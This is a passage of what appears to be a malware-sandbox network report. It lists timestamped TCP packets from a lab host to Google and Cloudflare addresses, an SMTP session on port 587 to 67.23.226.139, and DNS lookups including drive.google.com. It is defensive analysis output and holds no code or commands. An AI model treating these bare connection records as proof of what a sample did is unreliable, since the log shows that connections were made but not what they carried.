                                                                                            Nov 5, 2024 15:07:58.742754936 CET49947443192.168.2.7142.250.184.225
                                                                                            Nov 5, 2024 15:07:58.742763996 CET44349947142.250.184.225192.168.2.7
                                                                                            Nov 5, 2024 15:07:58.742805958 CET49947443192.168.2.7142.250.184.225
                                                                                            Nov 5, 2024 15:07:58.746237993 CET44349947142.250.184.225192.168.2.7
                                                                                            Nov 5, 2024 15:07:58.746283054 CET49947443192.168.2.7142.250.184.225
                                                                                            Nov 5, 2024 15:07:58.746341944 CET44349947142.250.184.225192.168.2.7
                                                                                            Nov 5, 2024 15:07:58.746381044 CET49947443192.168.2.7142.250.184.225
                                                                                            Nov 5, 2024 15:07:58.797497034 CET44349947142.250.184.225192.168.2.7
                                                                                            Nov 5, 2024 15:07:58.797600031 CET49947443192.168.2.7142.250.184.225
                                                                                            Nov 5, 2024 15:07:58.850322962 CET44349947142.250.184.225192.168.2.7
                                                                                            Nov 5, 2024 15:07:58.850400925 CET49947443192.168.2.7142.250.184.225
                                                                                            Nov 5, 2024 15:07:58.850429058 CET44349947142.250.184.225192.168.2.7
                                                                                            Nov 5, 2024 15:07:58.850486040 CET49947443192.168.2.7142.250.184.225
                                                                                            Nov 5, 2024 15:07:58.850497007 CET44349947142.250.184.225192.168.2.7
                                                                                            Nov 5, 2024 15:07:58.850548983 CET49947443192.168.2.7142.250.184.225
                                                                                            Nov 5, 2024 15:07:58.850585938 CET44349947142.250.184.225192.168.2.7
                                                                                            Nov 5, 2024 15:07:58.850640059 CET49947443192.168.2.7142.250.184.225
                                                                                            Nov 5, 2024 15:07:58.850707054 CET44349947142.250.184.225192.168.2.7
                                                                                            Nov 5, 2024 15:07:58.850759983 CET49947443192.168.2.7142.250.184.225
                                                                                            Nov 5, 2024 15:07:58.851068974 CET44349947142.250.184.225192.168.2.7
                                                                                            Nov 5, 2024 15:07:58.851125002 CET49947443192.168.2.7142.250.184.225
                                                                                            Nov 5, 2024 15:07:58.851151943 CET44349947142.250.184.225192.168.2.7
                                                                                            Nov 5, 2024 15:07:58.851197004 CET49947443192.168.2.7142.250.184.225
                                                                                            Nov 5, 2024 15:07:58.851249933 CET44349947142.250.184.225192.168.2.7
                                                                                            Nov 5, 2024 15:07:58.851305008 CET49947443192.168.2.7142.250.184.225
                                                                                            Nov 5, 2024 15:07:58.861345053 CET44349947142.250.184.225192.168.2.7
                                                                                            Nov 5, 2024 15:07:58.861403942 CET49947443192.168.2.7142.250.184.225
                                                                                            Nov 5, 2024 15:07:58.861469030 CET44349947142.250.184.225192.168.2.7
                                                                                            Nov 5, 2024 15:07:58.861515999 CET49947443192.168.2.7142.250.184.225
                                                                                            Nov 5, 2024 15:07:58.861766100 CET44349947142.250.184.225192.168.2.7
                                                                                            Nov 5, 2024 15:07:58.861810923 CET49947443192.168.2.7142.250.184.225
                                                                                            Nov 5, 2024 15:07:58.861979961 CET44349947142.250.184.225192.168.2.7
                                                                                            Nov 5, 2024 15:07:58.862024069 CET49947443192.168.2.7142.250.184.225
                                                                                            Nov 5, 2024 15:07:58.865252972 CET44349947142.250.184.225192.168.2.7
                                                                                            Nov 5, 2024 15:07:58.865302086 CET49947443192.168.2.7142.250.184.225
                                                                                            Nov 5, 2024 15:07:58.865339994 CET44349947142.250.184.225192.168.2.7
                                                                                            Nov 5, 2024 15:07:58.865395069 CET49947443192.168.2.7142.250.184.225
                                                                                            Nov 5, 2024 15:07:58.913700104 CET44349947142.250.184.225192.168.2.7
                                                                                            Nov 5, 2024 15:07:58.913764954 CET49947443192.168.2.7142.250.184.225
                                                                                            Nov 5, 2024 15:07:58.970078945 CET44349947142.250.184.225192.168.2.7
                                                                                            Nov 5, 2024 15:07:58.970197916 CET49947443192.168.2.7142.250.184.225
                                                                                            Nov 5, 2024 15:07:58.970216990 CET44349947142.250.184.225192.168.2.7
                                                                                            Nov 5, 2024 15:07:58.970264912 CET49947443192.168.2.7142.250.184.225
                                                                                            Nov 5, 2024 15:07:58.970269918 CET44349947142.250.184.225192.168.2.7
                                                                                            Nov 5, 2024 15:07:58.970309973 CET49947443192.168.2.7142.250.184.225
                                                                                            Nov 5, 2024 15:07:58.970324993 CET44349947142.250.184.225192.168.2.7
                                                                                            Nov 5, 2024 15:07:58.970371008 CET49947443192.168.2.7142.250.184.225
                                                                                            Nov 5, 2024 15:07:58.970438004 CET44349947142.250.184.225192.168.2.7
                                                                                            Nov 5, 2024 15:07:58.970494032 CET49947443192.168.2.7142.250.184.225
                                                                                            Nov 5, 2024 15:07:58.970689058 CET44349947142.250.184.225192.168.2.7
                                                                                            Nov 5, 2024 15:07:58.970747948 CET49947443192.168.2.7142.250.184.225
                                                                                            Nov 5, 2024 15:07:58.979933023 CET44349947142.250.184.225192.168.2.7
                                                                                            Nov 5, 2024 15:07:58.979984999 CET49947443192.168.2.7142.250.184.225
                                                                                            Nov 5, 2024 15:07:58.980058908 CET44349947142.250.184.225192.168.2.7
                                                                                            Nov 5, 2024 15:07:58.980118036 CET49947443192.168.2.7142.250.184.225
                                                                                            Nov 5, 2024 15:07:58.981220961 CET44349947142.250.184.225192.168.2.7
                                                                                            Nov 5, 2024 15:07:58.981280088 CET49947443192.168.2.7142.250.184.225
                                                                                            Nov 5, 2024 15:07:58.981354952 CET44349947142.250.184.225192.168.2.7
                                                                                            Nov 5, 2024 15:07:58.981406927 CET49947443192.168.2.7142.250.184.225
                                                                                            Nov 5, 2024 15:07:58.983933926 CET44349947142.250.184.225192.168.2.7
                                                                                            Nov 5, 2024 15:07:58.983989954 CET49947443192.168.2.7142.250.184.225
                                                                                            Nov 5, 2024 15:07:58.984065056 CET44349947142.250.184.225192.168.2.7
                                                                                            Nov 5, 2024 15:07:58.984110117 CET49947443192.168.2.7142.250.184.225
                                                                                            Nov 5, 2024 15:07:59.077727079 CET44349947142.250.184.225192.168.2.7
                                                                                            Nov 5, 2024 15:07:59.077872038 CET49947443192.168.2.7142.250.184.225
                                                                                            Nov 5, 2024 15:07:59.088593006 CET44349947142.250.184.225192.168.2.7
                                                                                            Nov 5, 2024 15:07:59.088700056 CET49947443192.168.2.7142.250.184.225
                                                                                            Nov 5, 2024 15:07:59.088727951 CET44349947142.250.184.225192.168.2.7
                                                                                            Nov 5, 2024 15:07:59.088789940 CET49947443192.168.2.7142.250.184.225
                                                                                            Nov 5, 2024 15:07:59.088794947 CET44349947142.250.184.225192.168.2.7
                                                                                            Nov 5, 2024 15:07:59.088841915 CET49947443192.168.2.7142.250.184.225
                                                                                            Nov 5, 2024 15:07:59.088846922 CET44349947142.250.184.225192.168.2.7
                                                                                            Nov 5, 2024 15:07:59.088885069 CET49947443192.168.2.7142.250.184.225
                                                                                            Nov 5, 2024 15:07:59.088888884 CET44349947142.250.184.225192.168.2.7
                                                                                            Nov 5, 2024 15:07:59.088934898 CET49947443192.168.2.7142.250.184.225
                                                                                            Nov 5, 2024 15:07:59.089176893 CET44349947142.250.184.225192.168.2.7
                                                                                            Nov 5, 2024 15:07:59.089235067 CET49947443192.168.2.7142.250.184.225
                                                                                            Nov 5, 2024 15:07:59.089289904 CET44349947142.250.184.225192.168.2.7
                                                                                            Nov 5, 2024 15:07:59.089338064 CET49947443192.168.2.7142.250.184.225
                                                                                            Nov 5, 2024 15:07:59.098988056 CET44349947142.250.184.225192.168.2.7
                                                                                            Nov 5, 2024 15:07:59.099050045 CET49947443192.168.2.7142.250.184.225
                                                                                            Nov 5, 2024 15:07:59.099057913 CET44349947142.250.184.225192.168.2.7
                                                                                            Nov 5, 2024 15:07:59.099215031 CET49947443192.168.2.7142.250.184.225
                                                                                            Nov 5, 2024 15:07:59.099904060 CET44349947142.250.184.225192.168.2.7
                                                                                            Nov 5, 2024 15:07:59.099950075 CET49947443192.168.2.7142.250.184.225
                                                                                            Nov 5, 2024 15:07:59.100032091 CET44349947142.250.184.225192.168.2.7
                                                                                            Nov 5, 2024 15:07:59.100073099 CET49947443192.168.2.7142.250.184.225
                                                                                            Nov 5, 2024 15:07:59.102848053 CET44349947142.250.184.225192.168.2.7
                                                                                            Nov 5, 2024 15:07:59.102899075 CET49947443192.168.2.7142.250.184.225
                                                                                            Nov 5, 2024 15:07:59.102930069 CET44349947142.250.184.225192.168.2.7
                                                                                            Nov 5, 2024 15:07:59.102972984 CET49947443192.168.2.7142.250.184.225
                                                                                            Nov 5, 2024 15:07:59.102979898 CET44349947142.250.184.225192.168.2.7
                                                                                            Nov 5, 2024 15:07:59.103018999 CET49947443192.168.2.7142.250.184.225
                                                                                            Nov 5, 2024 15:07:59.208034992 CET44349947142.250.184.225192.168.2.7
                                                                                            Nov 5, 2024 15:07:59.208132029 CET44349947142.250.184.225192.168.2.7
                                                                                            Nov 5, 2024 15:07:59.208157063 CET49947443192.168.2.7142.250.184.225
                                                                                            Nov 5, 2024 15:07:59.208194017 CET44349947142.250.184.225192.168.2.7
                                                                                            Nov 5, 2024 15:07:59.208209038 CET49947443192.168.2.7142.250.184.225
                                                                                            Nov 5, 2024 15:07:59.208241940 CET49947443192.168.2.7142.250.184.225
                                                                                            Nov 5, 2024 15:07:59.208383083 CET44349947142.250.184.225192.168.2.7
                                                                                            Nov 5, 2024 15:07:59.208439112 CET49947443192.168.2.7142.250.184.225
                                                                                            Nov 5, 2024 15:07:59.208740950 CET44349947142.250.184.225192.168.2.7
                                                                                            Nov 5, 2024 15:07:59.208796024 CET49947443192.168.2.7142.250.184.225
                                                                                            Nov 5, 2024 15:07:59.208801985 CET44349947142.250.184.225192.168.2.7
                                                                                            Nov 5, 2024 15:07:59.208848953 CET49947443192.168.2.7142.250.184.225
                                                                                            Nov 5, 2024 15:07:59.217866898 CET44349947142.250.184.225192.168.2.7
                                                                                            Nov 5, 2024 15:07:59.217936993 CET49947443192.168.2.7142.250.184.225
                                                                                            Nov 5, 2024 15:07:59.217942953 CET44349947142.250.184.225192.168.2.7
                                                                                            Nov 5, 2024 15:07:59.217987061 CET49947443192.168.2.7142.250.184.225
                                                                                            Nov 5, 2024 15:07:59.219010115 CET44349947142.250.184.225192.168.2.7
                                                                                            Nov 5, 2024 15:07:59.219059944 CET49947443192.168.2.7142.250.184.225
                                                                                            Nov 5, 2024 15:07:59.219115019 CET44349947142.250.184.225192.168.2.7
                                                                                            Nov 5, 2024 15:07:59.219162941 CET49947443192.168.2.7142.250.184.225
                                                                                            Nov 5, 2024 15:07:59.219166994 CET44349947142.250.184.225192.168.2.7
                                                                                            Nov 5, 2024 15:07:59.219213963 CET49947443192.168.2.7142.250.184.225
                                                                                            Nov 5, 2024 15:07:59.219381094 CET44349947142.250.184.225192.168.2.7
                                                                                            Nov 5, 2024 15:07:59.219432116 CET49947443192.168.2.7142.250.184.225
                                                                                            Nov 5, 2024 15:07:59.219436884 CET44349947142.250.184.225192.168.2.7
                                                                                            Nov 5, 2024 15:07:59.219482899 CET49947443192.168.2.7142.250.184.225
                                                                                            Nov 5, 2024 15:07:59.222014904 CET44349947142.250.184.225192.168.2.7
                                                                                            Nov 5, 2024 15:07:59.222060919 CET49947443192.168.2.7142.250.184.225
                                                                                            Nov 5, 2024 15:07:59.222067118 CET44349947142.250.184.225192.168.2.7
                                                                                            Nov 5, 2024 15:07:59.222104073 CET49947443192.168.2.7142.250.184.225
                                                                                            Nov 5, 2024 15:07:59.222218990 CET44349947142.250.184.225192.168.2.7
                                                                                            Nov 5, 2024 15:07:59.222260952 CET49947443192.168.2.7142.250.184.225
                                                                                            Nov 5, 2024 15:07:59.328409910 CET44349947142.250.184.225192.168.2.7
                                                                                            Nov 5, 2024 15:07:59.328530073 CET49947443192.168.2.7142.250.184.225
                                                                                            Nov 5, 2024 15:07:59.328655005 CET44349947142.250.184.225192.168.2.7
                                                                                            Nov 5, 2024 15:07:59.328707933 CET49947443192.168.2.7142.250.184.225
                                                                                            Nov 5, 2024 15:07:59.328738928 CET44349947142.250.184.225192.168.2.7
                                                                                            Nov 5, 2024 15:07:59.328782082 CET49947443192.168.2.7142.250.184.225
                                                                                            Nov 5, 2024 15:07:59.328885078 CET44349947142.250.184.225192.168.2.7
                                                                                            Nov 5, 2024 15:07:59.328927994 CET49947443192.168.2.7142.250.184.225
                                                                                            Nov 5, 2024 15:07:59.328936100 CET44349947142.250.184.225192.168.2.7
                                                                                            Nov 5, 2024 15:07:59.328980923 CET49947443192.168.2.7142.250.184.225
                                                                                            Nov 5, 2024 15:07:59.328984022 CET44349947142.250.184.225192.168.2.7
                                                                                            Nov 5, 2024 15:07:59.329020977 CET49947443192.168.2.7142.250.184.225
                                                                                            Nov 5, 2024 15:07:59.336765051 CET44349947142.250.184.225192.168.2.7
                                                                                            Nov 5, 2024 15:07:59.336817026 CET49947443192.168.2.7142.250.184.225
                                                                                            Nov 5, 2024 15:07:59.336822033 CET44349947142.250.184.225192.168.2.7
                                                                                            Nov 5, 2024 15:07:59.336863995 CET49947443192.168.2.7142.250.184.225
                                                                                            Nov 5, 2024 15:07:59.337987900 CET44349947142.250.184.225192.168.2.7
                                                                                            Nov 5, 2024 15:07:59.338038921 CET49947443192.168.2.7142.250.184.225
                                                                                            Nov 5, 2024 15:07:59.338042974 CET44349947142.250.184.225192.168.2.7
                                                                                            Nov 5, 2024 15:07:59.338082075 CET49947443192.168.2.7142.250.184.225
                                                                                            Nov 5, 2024 15:07:59.340848923 CET44349947142.250.184.225192.168.2.7
                                                                                            Nov 5, 2024 15:07:59.340903044 CET44349947142.250.184.225192.168.2.7
                                                                                            Nov 5, 2024 15:07:59.340903044 CET49947443192.168.2.7142.250.184.225
                                                                                            Nov 5, 2024 15:07:59.340913057 CET44349947142.250.184.225192.168.2.7
                                                                                            Nov 5, 2024 15:07:59.340945005 CET49947443192.168.2.7142.250.184.225
                                                                                            Nov 5, 2024 15:07:59.340984106 CET49947443192.168.2.7142.250.184.225
                                                                                            Nov 5, 2024 15:07:59.341080904 CET44349947142.250.184.225192.168.2.7
                                                                                            Nov 5, 2024 15:07:59.341129065 CET49947443192.168.2.7142.250.184.225
                                                                                            Nov 5, 2024 15:07:59.341135025 CET44349947142.250.184.225192.168.2.7
                                                                                            Nov 5, 2024 15:07:59.341183901 CET49947443192.168.2.7142.250.184.225
                                                                                            Nov 5, 2024 15:07:59.446846962 CET44349947142.250.184.225192.168.2.7
                                                                                            Nov 5, 2024 15:07:59.446917057 CET49947443192.168.2.7142.250.184.225
                                                                                            Nov 5, 2024 15:07:59.446957111 CET44349947142.250.184.225192.168.2.7
                                                                                            Nov 5, 2024 15:07:59.447000980 CET49947443192.168.2.7142.250.184.225
                                                                                            Nov 5, 2024 15:07:59.447010040 CET44349947142.250.184.225192.168.2.7
                                                                                            Nov 5, 2024 15:07:59.447058916 CET49947443192.168.2.7142.250.184.225
                                                                                            Nov 5, 2024 15:07:59.447120905 CET44349947142.250.184.225192.168.2.7
                                                                                            Nov 5, 2024 15:07:59.447164059 CET49947443192.168.2.7142.250.184.225
                                                                                            Nov 5, 2024 15:07:59.447169065 CET44349947142.250.184.225192.168.2.7
                                                                                            Nov 5, 2024 15:07:59.447216988 CET49947443192.168.2.7142.250.184.225
                                                                                            Nov 5, 2024 15:07:59.447571993 CET44349947142.250.184.225192.168.2.7
                                                                                            Nov 5, 2024 15:07:59.447623014 CET49947443192.168.2.7142.250.184.225
                                                                                            Nov 5, 2024 15:07:59.447628975 CET44349947142.250.184.225192.168.2.7
                                                                                            Nov 5, 2024 15:07:59.447676897 CET49947443192.168.2.7142.250.184.225
                                                                                            Nov 5, 2024 15:07:59.448070049 CET44349947142.250.184.225192.168.2.7
                                                                                            Nov 5, 2024 15:07:59.448118925 CET49947443192.168.2.7142.250.184.225
                                                                                            Nov 5, 2024 15:07:59.455765009 CET44349947142.250.184.225192.168.2.7
                                                                                            Nov 5, 2024 15:07:59.455821037 CET49947443192.168.2.7142.250.184.225
                                                                                            Nov 5, 2024 15:07:59.455826998 CET44349947142.250.184.225192.168.2.7
                                                                                            Nov 5, 2024 15:07:59.455872059 CET49947443192.168.2.7142.250.184.225
                                                                                            Nov 5, 2024 15:07:59.457263947 CET44349947142.250.184.225192.168.2.7
                                                                                            Nov 5, 2024 15:07:59.457314014 CET49947443192.168.2.7142.250.184.225
                                                                                            Nov 5, 2024 15:07:59.457753897 CET44349947142.250.184.225192.168.2.7
                                                                                            Nov 5, 2024 15:07:59.457807064 CET49947443192.168.2.7142.250.184.225
                                                                                            Nov 5, 2024 15:07:59.459988117 CET44349947142.250.184.225192.168.2.7
                                                                                            Nov 5, 2024 15:07:59.460041046 CET44349947142.250.184.225192.168.2.7
                                                                                            Nov 5, 2024 15:07:59.460064888 CET49947443192.168.2.7142.250.184.225
                                                                                            Nov 5, 2024 15:07:59.460072994 CET44349947142.250.184.225192.168.2.7
                                                                                            Nov 5, 2024 15:07:59.460093021 CET49947443192.168.2.7142.250.184.225
                                                                                            Nov 5, 2024 15:07:59.460129023 CET49947443192.168.2.7142.250.184.225
                                                                                            Nov 5, 2024 15:07:59.460246086 CET44349947142.250.184.225192.168.2.7
                                                                                            Nov 5, 2024 15:07:59.460294962 CET49947443192.168.2.7142.250.184.225
                                                                                            Nov 5, 2024 15:07:59.460653067 CET44349947142.250.184.225192.168.2.7
                                                                                            Nov 5, 2024 15:07:59.460701942 CET49947443192.168.2.7142.250.184.225
                                                                                            Nov 5, 2024 15:07:59.565732002 CET44349947142.250.184.225192.168.2.7
                                                                                            Nov 5, 2024 15:07:59.565876961 CET49947443192.168.2.7142.250.184.225
                                                                                            Nov 5, 2024 15:07:59.566061020 CET44349947142.250.184.225192.168.2.7
                                                                                            Nov 5, 2024 15:07:59.566109896 CET49947443192.168.2.7142.250.184.225
                                                                                            Nov 5, 2024 15:07:59.566119909 CET44349947142.250.184.225192.168.2.7
                                                                                            Nov 5, 2024 15:07:59.566165924 CET49947443192.168.2.7142.250.184.225
                                                                                            Nov 5, 2024 15:07:59.566169977 CET44349947142.250.184.225192.168.2.7
                                                                                            Nov 5, 2024 15:07:59.566214085 CET49947443192.168.2.7142.250.184.225
                                                                                            Nov 5, 2024 15:07:59.567603111 CET44349947142.250.184.225192.168.2.7
                                                                                            Nov 5, 2024 15:07:59.567646027 CET49947443192.168.2.7142.250.184.225
                                                                                            Nov 5, 2024 15:07:59.567651033 CET44349947142.250.184.225192.168.2.7
                                                                                            Nov 5, 2024 15:07:59.567693949 CET49947443192.168.2.7142.250.184.225
                                                                                            Nov 5, 2024 15:07:59.574609995 CET44349947142.250.184.225192.168.2.7
                                                                                            Nov 5, 2024 15:07:59.574659109 CET49947443192.168.2.7142.250.184.225
                                                                                            Nov 5, 2024 15:07:59.574724913 CET44349947142.250.184.225192.168.2.7
                                                                                            Nov 5, 2024 15:07:59.574769974 CET49947443192.168.2.7142.250.184.225
                                                                                            Nov 5, 2024 15:07:59.574775934 CET44349947142.250.184.225192.168.2.7
                                                                                            Nov 5, 2024 15:07:59.574820042 CET49947443192.168.2.7142.250.184.225
                                                                                            Nov 5, 2024 15:07:59.575175047 CET44349947142.250.184.225192.168.2.7
                                                                                            Nov 5, 2024 15:07:59.575218916 CET49947443192.168.2.7142.250.184.225
                                                                                            Nov 5, 2024 15:07:59.576436996 CET44349947142.250.184.225192.168.2.7
                                                                                            Nov 5, 2024 15:07:59.576483965 CET49947443192.168.2.7142.250.184.225
                                                                                            Nov 5, 2024 15:07:59.576507092 CET44349947142.250.184.225192.168.2.7
                                                                                            Nov 5, 2024 15:07:59.576550961 CET49947443192.168.2.7142.250.184.225
                                                                                            Nov 5, 2024 15:07:59.576555014 CET44349947142.250.184.225192.168.2.7
                                                                                            Nov 5, 2024 15:07:59.576591015 CET49947443192.168.2.7142.250.184.225
                                                                                            Nov 5, 2024 15:07:59.578759909 CET44349947142.250.184.225192.168.2.7
                                                                                            Nov 5, 2024 15:07:59.578804016 CET49947443192.168.2.7142.250.184.225
                                                                                            Nov 5, 2024 15:07:59.578916073 CET44349947142.250.184.225192.168.2.7
                                                                                            Nov 5, 2024 15:07:59.578954935 CET49947443192.168.2.7142.250.184.225
                                                                                            Nov 5, 2024 15:07:59.579138041 CET44349947142.250.184.225192.168.2.7
                                                                                            Nov 5, 2024 15:07:59.579178095 CET49947443192.168.2.7142.250.184.225
                                                                                            Nov 5, 2024 15:07:59.579571009 CET44349947142.250.184.225192.168.2.7
                                                                                            Nov 5, 2024 15:07:59.579610109 CET49947443192.168.2.7142.250.184.225
                                                                                            Nov 5, 2024 15:07:59.621108055 CET44349947142.250.184.225192.168.2.7
                                                                                            Nov 5, 2024 15:07:59.621162891 CET49947443192.168.2.7142.250.184.225
                                                                                            Nov 5, 2024 15:07:59.684715986 CET44349947142.250.184.225192.168.2.7
                                                                                            Nov 5, 2024 15:07:59.684778929 CET44349947142.250.184.225192.168.2.7
                                                                                            Nov 5, 2024 15:07:59.684782028 CET49947443192.168.2.7142.250.184.225
                                                                                            Nov 5, 2024 15:07:59.684799910 CET44349947142.250.184.225192.168.2.7
                                                                                            Nov 5, 2024 15:07:59.684822083 CET49947443192.168.2.7142.250.184.225
                                                                                            Nov 5, 2024 15:07:59.684864044 CET49947443192.168.2.7142.250.184.225
                                                                                            Nov 5, 2024 15:07:59.686619997 CET44349947142.250.184.225192.168.2.7
                                                                                            Nov 5, 2024 15:07:59.686672926 CET49947443192.168.2.7142.250.184.225
                                                                                            Nov 5, 2024 15:07:59.686698914 CET44349947142.250.184.225192.168.2.7
                                                                                            Nov 5, 2024 15:07:59.686743975 CET49947443192.168.2.7142.250.184.225
                                                                                            Nov 5, 2024 15:07:59.693774939 CET44349947142.250.184.225192.168.2.7
                                                                                            Nov 5, 2024 15:07:59.693830967 CET49947443192.168.2.7142.250.184.225
                                                                                            Nov 5, 2024 15:07:59.694839001 CET44349947142.250.184.225192.168.2.7
                                                                                            Nov 5, 2024 15:07:59.694885969 CET49947443192.168.2.7142.250.184.225
                                                                                            Nov 5, 2024 15:07:59.694892883 CET44349947142.250.184.225192.168.2.7
                                                                                            Nov 5, 2024 15:07:59.694921017 CET49947443192.168.2.7142.250.184.225
                                                                                            Nov 5, 2024 15:07:59.694924116 CET44349947142.250.184.225192.168.2.7
                                                                                            Nov 5, 2024 15:07:59.694931030 CET49947443192.168.2.7142.250.184.225
                                                                                            Nov 5, 2024 15:07:59.694933891 CET44349947142.250.184.225192.168.2.7
                                                                                            Nov 5, 2024 15:07:59.694982052 CET49947443192.168.2.7142.250.184.225
                                                                                            Nov 5, 2024 15:08:00.286189079 CET49977443192.168.2.7172.67.74.152
                                                                                            Nov 5, 2024 15:08:00.286240101 CET44349977172.67.74.152192.168.2.7
                                                                                            Nov 5, 2024 15:08:00.286338091 CET49977443192.168.2.7172.67.74.152
                                                                                            Nov 5, 2024 15:08:00.290081978 CET49977443192.168.2.7172.67.74.152
                                                                                            Nov 5, 2024 15:08:00.290093899 CET44349977172.67.74.152192.168.2.7
                                                                                            Nov 5, 2024 15:08:00.933928967 CET44349977172.67.74.152192.168.2.7
                                                                                            Nov 5, 2024 15:08:00.934019089 CET49977443192.168.2.7172.67.74.152
                                                                                            Nov 5, 2024 15:08:00.935672045 CET49977443192.168.2.7172.67.74.152
                                                                                            Nov 5, 2024 15:08:00.935682058 CET44349977172.67.74.152192.168.2.7
                                                                                            Nov 5, 2024 15:08:00.935962915 CET44349977172.67.74.152192.168.2.7
                                                                                            Nov 5, 2024 15:08:00.939682961 CET49977443192.168.2.7172.67.74.152
                                                                                            Nov 5, 2024 15:08:00.983341932 CET44349977172.67.74.152192.168.2.7
                                                                                            Nov 5, 2024 15:08:01.117312908 CET44349977172.67.74.152192.168.2.7
                                                                                            Nov 5, 2024 15:08:01.117384911 CET44349977172.67.74.152192.168.2.7
                                                                                            Nov 5, 2024 15:08:01.117433071 CET49977443192.168.2.7172.67.74.152
                                                                                            Nov 5, 2024 15:08:01.123526096 CET49977443192.168.2.7172.67.74.152
                                                                                            Nov 5, 2024 15:08:03.158878088 CET49993587192.168.2.767.23.226.139
                                                                                            Nov 5, 2024 15:08:03.163806915 CET5874999367.23.226.139192.168.2.7
                                                                                            Nov 5, 2024 15:08:03.163944960 CET49993587192.168.2.767.23.226.139
                                                                                            Nov 5, 2024 15:08:03.887131929 CET5874999367.23.226.139192.168.2.7
                                                                                            Nov 5, 2024 15:08:03.887388945 CET49993587192.168.2.767.23.226.139
                                                                                            Nov 5, 2024 15:08:03.892340899 CET5874999367.23.226.139192.168.2.7
                                                                                            Nov 5, 2024 15:08:04.036858082 CET5874999367.23.226.139192.168.2.7
                                                                                            Nov 5, 2024 15:08:04.037050962 CET49993587192.168.2.767.23.226.139
                                                                                            Nov 5, 2024 15:08:04.041991949 CET5874999367.23.226.139192.168.2.7
                                                                                            Nov 5, 2024 15:08:04.190404892 CET5874999367.23.226.139192.168.2.7
                                                                                            Nov 5, 2024 15:08:04.190848112 CET49993587192.168.2.767.23.226.139
                                                                                            Nov 5, 2024 15:08:04.195909977 CET5874999367.23.226.139192.168.2.7
                                                                                            Nov 5, 2024 15:08:04.360245943 CET5874999367.23.226.139192.168.2.7
                                                                                            Nov 5, 2024 15:08:04.360327959 CET5874999367.23.226.139192.168.2.7
                                                                                            Nov 5, 2024 15:08:04.360586882 CET49993587192.168.2.767.23.226.139
                                                                                            Nov 5, 2024 15:08:04.361793041 CET5874999367.23.226.139192.168.2.7
                                                                                            Nov 5, 2024 15:08:04.361836910 CET5874999367.23.226.139192.168.2.7
                                                                                            Nov 5, 2024 15:08:04.361846924 CET5874999367.23.226.139192.168.2.7
                                                                                            Nov 5, 2024 15:08:04.361893892 CET49993587192.168.2.767.23.226.139
                                                                                            Nov 5, 2024 15:08:04.388442993 CET49993587192.168.2.767.23.226.139
                                                                                            Nov 5, 2024 15:08:04.393341064 CET5874999367.23.226.139192.168.2.7
                                                                                            Nov 5, 2024 15:08:04.538204908 CET5874999367.23.226.139192.168.2.7
                                                                                            Nov 5, 2024 15:08:04.540424109 CET49993587192.168.2.767.23.226.139
                                                                                            Nov 5, 2024 15:08:04.545485020 CET5874999367.23.226.139192.168.2.7
                                                                                            Nov 5, 2024 15:08:04.689522028 CET5874999367.23.226.139192.168.2.7
                                                                                            Nov 5, 2024 15:08:04.690587997 CET49993587192.168.2.767.23.226.139
                                                                                            Nov 5, 2024 15:08:04.696875095 CET5874999367.23.226.139192.168.2.7
                                                                                            Nov 5, 2024 15:08:04.842708111 CET5874999367.23.226.139192.168.2.7
                                                                                            Nov 5, 2024 15:08:04.843890905 CET49993587192.168.2.767.23.226.139
                                                                                            Nov 5, 2024 15:08:04.848856926 CET5874999367.23.226.139192.168.2.7
                                                                                            Nov 5, 2024 15:08:05.000154972 CET5874999367.23.226.139192.168.2.7
                                                                                            Nov 5, 2024 15:08:05.000464916 CET49993587192.168.2.767.23.226.139
                                                                                            Nov 5, 2024 15:08:05.005609035 CET5874999367.23.226.139192.168.2.7
                                                                                            Nov 5, 2024 15:08:05.150585890 CET5874999367.23.226.139192.168.2.7
                                                                                            Nov 5, 2024 15:08:05.150954962 CET49993587192.168.2.767.23.226.139
                                                                                            Nov 5, 2024 15:08:05.156210899 CET5874999367.23.226.139192.168.2.7
                                                                                            Nov 5, 2024 15:08:05.303503990 CET5874999367.23.226.139192.168.2.7
                                                                                            Nov 5, 2024 15:08:05.303801060 CET49993587192.168.2.767.23.226.139
                                                                                            Nov 5, 2024 15:08:05.308806896 CET5874999367.23.226.139192.168.2.7
                                                                                            Nov 5, 2024 15:08:05.452995062 CET5874999367.23.226.139192.168.2.7
                                                                                            Nov 5, 2024 15:08:05.453632116 CET49993587192.168.2.767.23.226.139
                                                                                            Nov 5, 2024 15:08:05.453727961 CET49993587192.168.2.767.23.226.139
                                                                                            Nov 5, 2024 15:08:05.453727961 CET49993587192.168.2.767.23.226.139
                                                                                            Nov 5, 2024 15:08:05.453728914 CET49993587192.168.2.767.23.226.139
                                                                                            Nov 5, 2024 15:08:05.458827019 CET5874999367.23.226.139192.168.2.7
                                                                                            Nov 5, 2024 15:08:05.458842039 CET5874999367.23.226.139192.168.2.7
                                                                                            Nov 5, 2024 15:08:05.459173918 CET5874999367.23.226.139192.168.2.7
                                                                                            Nov 5, 2024 15:08:05.459182978 CET5874999367.23.226.139192.168.2.7
                                                                                            Nov 5, 2024 15:08:05.606760025 CET5874999367.23.226.139192.168.2.7
                                                                                            Nov 5, 2024 15:08:05.651873112 CET49993587192.168.2.767.23.226.139
                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                            Nov 5, 2024 15:07:48.987809896 CET5357848162.159.36.2192.168.2.7
                                                                                            Nov 5, 2024 15:07:49.634295940 CET53599471.1.1.1192.168.2.7
                                                                                            Nov 5, 2024 15:07:53.073046923 CET5376753192.168.2.71.1.1.1
                                                                                            Nov 5, 2024 15:07:53.080282927 CET53537671.1.1.1192.168.2.7
                                                                                            Nov 5, 2024 15:07:54.547780991 CET5110353192.168.2.71.1.1.1
                                                                                            Nov 5, 2024 15:07:54.555398941 CET53511031.1.1.1192.168.2.7
                                                                                            Nov 5, 2024 15:08:00.033849955 CET6237453192.168.2.71.1.1.1
                                                                                            Nov 5, 2024 15:08:00.281764984 CET53623741.1.1.1192.168.2.7
                                                                                            Nov 5, 2024 15:08:01.957158089 CET6301053192.168.2.71.1.1.1
                                                                                            Nov 5, 2024 15:08:02.964685917 CET6301053192.168.2.71.1.1.1
                                                                                            Nov 5, 2024 15:08:03.157463074 CET53630101.1.1.1192.168.2.7
                                                                                            Nov 5, 2024 15:08:03.158066988 CET53630101.1.1.1192.168.2.7
                                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                            Nov 5, 2024 15:07:53.073046923 CET192.168.2.71.1.1.10x7f30Standard query (0)drive.google.comA (IP address)IN (0x0001)false
